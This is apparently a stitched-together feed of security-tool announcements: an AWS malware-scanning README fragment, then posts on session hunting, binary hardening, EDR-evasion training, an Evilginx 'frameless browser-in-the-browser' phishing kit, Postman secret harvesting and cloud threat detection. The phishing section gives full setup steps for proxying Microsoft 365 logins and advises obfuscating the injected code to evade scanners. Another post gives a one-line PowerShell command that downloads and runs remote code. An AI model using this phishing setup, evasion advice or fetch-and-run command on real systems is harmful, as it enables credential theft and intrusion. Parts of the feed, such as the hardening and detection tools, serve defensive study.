    The duration of the malware scan operation will depend on the number of servers/volumes to scan (and their size). When Amazon GuardDuty finds malware, it generates a SecurityHub finding: the solution intercepts this event and runs the $StackName-SecurityHubAnnotations lambda to augment the SecurityHub finding with a note containing the name(s) of the DRS source server(s) with malware.

    The SQS FIFO queues can be monitored using the Messages available and Message in flight metrics from the AWS SQS console

    The DRS Volume Annotations DynamoDB tables keeps track of the status of each Malware scan operation.

    Amazon GuardDuty has documented reasons to skip scan operations. For further information please check Reasons for skipping resource during malware scan

    In order to analize logs from Amazon GuardDuty Malware scan operations, you can check /aws/guardduty/malware-scan-events Amazon Cloudwatch LogGroup. The default log retention period for this log group is 90 days, after which the log events are deleted automatically.

    Cleanup

    1. Run the following commands in your terminal:

      cdk destroy --all

    2. (Optional) Delete the CloudWatch log groups associated with Lambda Functions.

    AWS Cost Estimation Analysis

    For the purpose of this analysis, we have assumed a fictitious scenario to take as an example. The following cost estimates are based on services located in the North Virginia (us-east-1) region.

    Estimated scenario:

    • 2 Source Servers to replicate (DR) (Total Storage: 100GB - 4 disks)
    • 3 TB Malware Scanned/Month
    • 30 days of EBS snapshot Retention period
    • Daily Malware scans
    Monthly Cost Total Cost for 12 Months
    171.22 USD 2,054.74 USD

    Service Breakdown:

    Service Name Description Monthly Cost (USD)
    AWS Elastic Disaster Recovery 2 Source Servers / 1 Replication Server / 4 disks / 100GB / 30 days of EBS Snapshot Retention Period 71.41
    Amazon GuardDuty 3 TB Malware Scanned/Month 94.56
    Amazon DynamoDB 100MB 1 Read/Second 1 Writes/Second 3.65
    AWS Security Hub 1 Account / 100 Security Checks / 1000 Finding Ingested 0.10
    AWS EventBridge 1M custom events 1.00
    Amazon Cloudwatch 1GB ingested/month 0.50
    AWS Lambda 5 ARM Lambda Functions - 128MB / 10secs 0.00
    Amazon SQS 2 SQS Fifo 0.00
    Total 171.22

    Note The figures presented here are estimates based on the assumptions described above, derived from the AWS Pricing Calculator. For further details please check this pricing calculator as a reference. You can adjust the services configuration in the referenced calculator to make your own estimation. This estimation does not include potential taxes or additional charges that might be applicable. It's crucial to remember that actual fees can vary based on usage and any additional services not covered in this analysis. For critical environments is advisable to include Business Support Plan (not considered in the estimation)

    Security

    See CONTRIBUTING for more information.

    Authors



    Invoke-SessionHunter - Retrieve And Display Information About Active User Sessions On Remote Computers (No Admin Privileges Required)

    By: Zion3R


    Retrieve and display information about active user sessions on remote computers. No admin privileges required.

    The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.

    If the -CheckAdminAccess switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which most likely will retrieve more results)

    It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and sessions information will be retrieved. If set to "Disabled" no session information can be retrieved from the target.


    Usage:

    iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')

    If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry

    Invoke-SessionHunter

    Gather sessions by authenticating to targets where you have local admin access

    Invoke-SessionHunter -CheckAsAdmin

    You can optionally provide credentials in the following format

    Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"

    You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.

    This works in cobination with -Timeout | Default = 2, increase for slower networks.

    Invoke-SessionHunter -FailSafe
    Invoke-SessionHunter -FailSafe -Timeout 5

    Use the -Match switch to show only targets where you have admin access and a privileged user is logged in

    Invoke-SessionHunter -Match

    All switches can be combined

    Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match

    Specify the target domain

    Invoke-SessionHunter -Domain contoso.local

    Specify a comma-separated list of targets or the full path to a file containing a list of targets - one per line

    Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
    Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt

    Retrieve and display information about active user sessions on servers only

    Invoke-SessionHunter -Servers

    Retrieve and display information about active user sessions on workstations only

    Invoke-SessionHunter -Workstations

    Show active session for the specified user only

    Invoke-SessionHunter -Hunt "Administrator"

    Exclude localhost from the sessions retrieval

    Invoke-SessionHunter -IncludeLocalHost

    Return custom PSObjects instead of table-formatted results

    Invoke-SessionHunter -RawResults

    Do not run a port scan to enumerate for alive hosts before trying to retrieve sessions

    Note: if a host is not reachable it will hang for a while

    Invoke-SessionHunter -NoPortScan


    HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems

    By: Zion3R


    HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. Hardening Meter supports all Linux distributions and machine-readable output, the results can be printed to the screen a table format or be exported to a csv. (For more information see Documentation.md file)


    Execute Scanning Example

    Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.

    python3 HardeningMeter.py -f /bin/cp -s

    Installation Requirements

    Before installing HardeningMeter, make sure your machine has the following: 1. readelf and file commands 2. python version 3 3. pip 4. tabulate

    pip install tabulate

    Install HardeningMeter

    The very latest developments can be obtained via git.

    Clone or download the project files (no compilation nor installation is required)

    git clone https://github.com/OfriOuzan/HardeningMeter

    Arguments

    -f --file

    Specify the files you want to scan, the argument can get more than one file seperated by spaces.

    -d --directory

    Specify the directory you want to scan, the argument retrieves one directory and scan all ELF files recursively.

    -e --external

    Specify whether you want to add external checks (False by default).

    -m --show_missing

    Prints according to the order, only those files that are missing security hardening mechanisms and need extra attention.

    -s --system

    Specify if you want to scan the system hardening methods.

    -c --csv_format'

    Specify if you want to save the results to csv file (results are printed as a table to stdout by default).

    Results

    HardeningMeter's results are printed as a table and consisted of 3 different states: - (X) - This state indicates that the binary hardening mechanism is disabled. - (V) - This state indicates that the binary hardening mechanism is enabled. - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.

    Notes

    When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.



    CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

    By: Zion3R


    CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


    Features

    Detection Description
    Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
    NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
    AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
    ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
    PE Stomping Identifies instances of PE (Portable Executable) stomping.
    Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
    Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
    Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
    API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
    Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.

    Installation

    To get started with CrimsonEDR, follow these steps:

    1. Install dependancy: bash sudo apt-get install gcc-mingw-w64-x86-64
    2. Clone the repository: bash git clone https://github.com/Helixo32/CrimsonEDR
    3. Compile the project: bash cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

    โš ๏ธ Warning

    Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

    Usage

    To use CrimsonEDR, follow these steps:

    1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
    {
    "IOC": [
    ["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
    ["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
    ["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
    ["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
    ["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
    ["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
    ["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
    ["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
    ]
    }
    1. Execute CrimsonEDRPanel.exe with the following arguments:

      • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

      • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

    For example:

    .\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

    Useful Links

    Here are some useful resources that helped in the development of this project:

    Contact

    For questions, feedback, or support, please reach out to me via:



    Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

    By: Zion3R


    A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

    This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


    Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. โ–ถ Watch Video

    โ˜•๏ธŽ Buy Me A Coffee

    Video Tutorial: ๐Ÿ‘‡

    Disclaimer

    This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

    Backstory - The Why

    Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

    That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

    The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

    In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

    The What

    A Browser In The Browser (BITB) without any iframes! As simple as that.

    Meaning that we can now use BITB with Evilginx on websites like Microsoft.

    Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

    The How

    Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.

    Instructions

    Video Tutorial


    Local VM:

    Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

    Update and Upgrade system packages:

    sudo apt update && sudo apt upgrade -y

    Evilginx Setup:

    Optional:

    Create a new evilginx user, and add user to sudo group:

    sudo su

    adduser evilginx

    usermod -aG sudo evilginx

    Test that evilginx user is in sudo group:

    su - evilginx

    sudo ls -la /root

    Navigate to users home dir:

    cd /home/evilginx

    (You can do everything as sudo user as well since we're running everything locally)

    Setting Up Evilginx

    Download and build Evilginx: Official Docs

    Copy Evilginx files to /home/evilginx

    Install Go: Official Docs

    wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
    sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
    nano ~/.profile

    ADD: export PATH=$PATH:/usr/local/go/bin

    source ~/.profile

    Check:

    go version

    Install make:

    sudo apt install make

    Build Evilginx:

    cd /home/evilginx/evilginx2
    make

    Create a new directory for our evilginx build along with phishlets and redirectors:

    mkdir /home/evilginx/evilginx

    Copy build, phishlets, and redirectors:

    cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

    cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

    cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

    Ubuntu firewall quick fix (thanks to @kgretzky)

    sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

    On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

    sudo nano /etc/systemd/resolved.conf

    edit/add the DNSStubListener to no > DNSStubListener=no

    then

    sudo systemctl restart systemd-resolved

    Modify Evilginx Configurations:

    Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

    nano ~/.evilginx/config.json

    CHANGE https_port from 443 to 8443

    Install Apache2 and Enable Mods:

    Install Apache2:

    sudo apt install apache2 -y

    Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

    sudo a2enmod proxy
    sudo a2enmod proxy_http
    sudo a2enmod proxy_balancer
    sudo a2enmod lbmethod_byrequests
    sudo a2enmod env
    sudo a2enmod include
    sudo a2enmod setenvif
    sudo a2enmod ssl
    sudo a2ensite default-ssl
    sudo a2enmod cache
    sudo a2enmod substitute
    sudo a2enmod headers
    sudo a2enmod rewrite
    sudo a2dismod access_compat

    Start and enable Apache:

    sudo systemctl start apache2
    sudo systemctl enable apache2

    Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.

    Clone this Repo:

    Install git if not already available:

    sudo apt -y install git

    Clone this repo:

    git clone https://github.com/waelmas/frameless-bitb
    cd frameless-bitb

    Apache Custom Pages:

    Make directories for the pages we will be serving:

    • home: (Optional) Homepage (at base domain)
    • primary: Landing page (background)
    • secondary: BITB Window (foreground)
    sudo mkdir /var/www/home
    sudo mkdir /var/www/primary
    sudo mkdir /var/www/secondary

    Copy the directories for each page:


    sudo cp -r ./pages/home/ /var/www/

    sudo cp -r ./pages/primary/ /var/www/

    sudo cp -r ./pages/secondary/ /var/www/

    Optional: Remove the default Apache page (not used):

    sudo rm -r /var/www/html/

    Copy the O365 phishlet to phishlets directory:

    sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

    Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

    Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

    Self-signed SSL certificates:

    Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

    We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

    Create dir and parents if they do not exist:

    sudo mkdir -p /etc/ssl/localcerts/fake.com/

    Generate the SSL certs using the OpenSSL config file:

    sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
    -keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
    -config openssl-local.cnf

    Modify private key permissions:

    sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

    Apache Custom Configs:

    Copy custom substitution files (the core of our approach):

    sudo cp -r ./custom-subs /etc/apache2/custom-subs

    Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.

    Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

    # Uncomment the one you want and remember to restart Apache after any changes:
    #Include /etc/apache2/custom-subs/win-chrome.conf
    Include /etc/apache2/custom-subs/mac-chrome.conf

    Simply to make it easier, I included both versions as separate files for this next step.

    Windows/Chrome BITB:

    sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

    Mac/Chrome BITB:

    sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

    Test Apache configs to ensure there are no errors:

    sudo apache2ctl configtest

    Restart Apache to apply changes:

    sudo systemctl restart apache2

    Modifying Hosts:

    Get the IP of the VM using ifconfig and note it somewhere for the next step.

    We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

    On Windows:

    Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

    Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:

    C:\Windows\System32\drivers\etc\

    Change the file types (bottom-right) to "All files".

    Double-click the file named hosts

    On Mac:

    Open a terminal and run the following:

    sudo nano /private/etc/hosts

    Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

    # Local Apache and Evilginx Setup
    [IP] login.fake.com
    [IP] account.fake.com
    [IP] sso.fake.com
    [IP] www.fake.com
    [IP] portal.fake.com
    [IP] fake.com
    # End of section

    Save and exit.

    Now restart your browser before moving to the next step.

    Note: On Mac, use the following command to flush the DNS cache:

    sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

    Important Note:

    This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the 127.0.0.1 with the actual local IP of your VM.

    Trusting the Self-Signed SSL Certs:

    Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

    For this step, it's easier to follow the video instructions, but here is the gist anyway.

    Open https://fake.com/ in your Chrome browser.

    Ignore the Unsafe Site warning and proceed to the page.

    Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

    Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".

    On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

    Now RESTART your Browser

    You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

    Running Evilginx:

    At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

    Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

    sudo apt install tmux -y

    Start Evilginx in developer mode (using tmux to avoid losing the session):

    tmux new-session -s evilginx
    cd ~/evilginx/
    ./evilginx -developer

    (To re-attach to the tmux session use tmux attach-session -t evilginx)

    Evilginx Config:

    config domain fake.com
    config ipv4 127.0.0.1

    IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

    blacklist noadd

    Setup Phishlet and Lure:

    phishlets hostname O365 fake.com
    phishlets enable O365
    lures create O365
    lures get-url 0

    Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

    Useful Resources

    Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

    Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

    My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

    How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

    Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

    TODO

    • Create script(s) to automate most of the steps


    Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

    By: Zion3R


    Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

    Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

    • Workspaces
    • Collections
    • Requests
    • Users
    • Teams

    Installation

    python3 -m pip install porch-pirate

    Using the client

    The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

    Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

    • --globals
    • --collections
    • --requests
    • --urls
    • --dump
    • --raw
    • --curl

    Simple Search

    porch-pirate -s "coca-cola.com"

    Get Workspace Globals

    By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

    Dump Workspace

    When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

    Automatic Search and Globals Extraction

    Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

    porch-pirate -s "shopify" --globals

    Automatic Search Dump

    Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

    porch-pirate -s "coca-cola.com" --dump

    Extract URLs from Workspace

    A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

    Automatic URL Extraction

    Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

    porch-pirate -s "coca-cola.com" --urls

    Show Collections in a Workspace

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

    Show Workspace Requests

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

    Show raw JSON

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

    Show Entity Information

    porch-pirate -w WORKSPACE_ID
    porch-pirate -c COLLECTION_ID
    porch-pirate -r REQUEST_ID
    porch-pirate -u USERNAME/TEAMNAME

    Convert Request to Curl

    Porch Pirate can build curl requests when provided with a request ID for easier testing.

    porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

    Use a proxy

    porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

    Using as a library

    Searching

    p = porchpirate()
    print(p.search('coca-cola.com'))

    Get Workspace Collections

    p = porchpirate()
    print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Dumping a Workspace

    p = porchpirate()
    collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
    for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
    request_data = p.request(r['id'])
    print(request_data)

    Grabbing a Workspace's Globals

    p = porchpirate()
    print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Other Examples

    Other library usage examples can be located in the examples directory, which contains the following examples:

    • dump_workspace.py
    • format_search_results.py
    • format_workspace_collections.py
    • format_workspace_globals.py
    • get_collection.py
    • get_collections.py
    • get_profile.py
    • get_request.py
    • get_statistics.py
    • get_team.py
    • get_user.py
    • get_workspace.py
    • recursive_globals_from_search.py
    • request_to_curl.py
    • search.py
    • search_by_page.py
    • workspace_collections.py


    CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

    By: Zion3R


    Permiso: https://permiso.io
    Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

    CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


    Notes

    To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

    Required Packages

    bash pip3 install -r requirements.txt

    Cloning cloudgrep locally

    To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

    bash chmod +x clone.sh ./clone.sh

    Input

    This tool offers a CLI (Command Line Interface). As such, here we review its use:

    Example 1 - Running the tool with default queries file

    Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

    Note

    Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

    {
    "AWS": [
    {
    "bucket": "cloudtrail-logs-00000000-ffffff",
    "prefix": [
    "testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
    "testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
    ]
    },
    {
    "bucket": "aws-kosova-us-east-1-00000000"
    }

    ],
    "AZURE": [
    {
    "accountname": "logs",
    "container": [
    "cloudgrappler"
    ]
    }
    ]
    }

    Run command

    python3 main.py

    Example 2 - Permiso Intel Use Case

    python3 main.py -p

    [+] Running GetFileDownloadUrls.*secrets_ for AWS 
    [+] Threat Actor: LUCR3
    [+] Severity: MEDIUM
    [+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.

    Example 3 - Generate report

    python3 main.py -p -jo

    reports
    โ””โ”€โ”€ json
    โ”œโ”€โ”€ AWS
    โ”‚ย ย  โ””โ”€โ”€ 2024-03-04 01:01 AM
    โ”‚ย ย  โ””โ”€โ”€ cloudtrail-logs-00000000-ffffff--
    โ”‚ย ย  โ””โ”€โ”€ testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    โ”‚ย ย  โ””โ”€โ”€ GetFileDownloadUrls.*secrets_.json
    โ””โ”€โ”€ AZURE
    โ””โ”€โ”€ 2024-03-04 01:01 AM
    โ””โ”€โ”€ logs
    โ””โ”€โ”€ cloudgrappler
    โ””โ”€โ”€ okta_key.json

    Example 4 - Filtering logs based on date or time

    python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

    Example 5 - Manually adding queries and data source types

    python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

    Example 6 - Running the tool with your own queries file

    python3 main.py -f new_file.json

    Running in your Cloud and Authentication cloudgrep

    AWS

    Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

    If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.

    Azure

    The simplest way to authenticate with Azure is to first run:

    az login

    This will open a browser window and prompt you to login to Azure.



    ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols utilized By IoT Devices

    By: Zion3R


    ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.


    ~ Hilali Abdel

    USAGE

    python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

    [Add new Device]

    python3 smartthings.py -a 192.168.1.1

    python3 smarthings.py -s --type TPLINK

    python3 smartthings.py -s --firmware TP-Link Archer C7v2

    Search for CVE and Poc [ firmware and device type]

    ย 

    Scan device for open upnp ports

    python3 smartthings.py -s --scan upnp --id

    get data from mqtt 'subscribe'

    python3 smartthings.py -s --scan mqtt --id



    Sr2T - Converts Scanning Reports To A Tabular Format

    By: Zion3R


    Scanning reports to tabular (sr2t)

    This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:

    1. Nmap (XML);
    2. Nessus (XML);
    3. Nikto (XML);
    4. Dirble (XML);
    5. Testssl (JSON);
    6. Fortify (FPR).

    Rationale

    This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.

    Dependencies

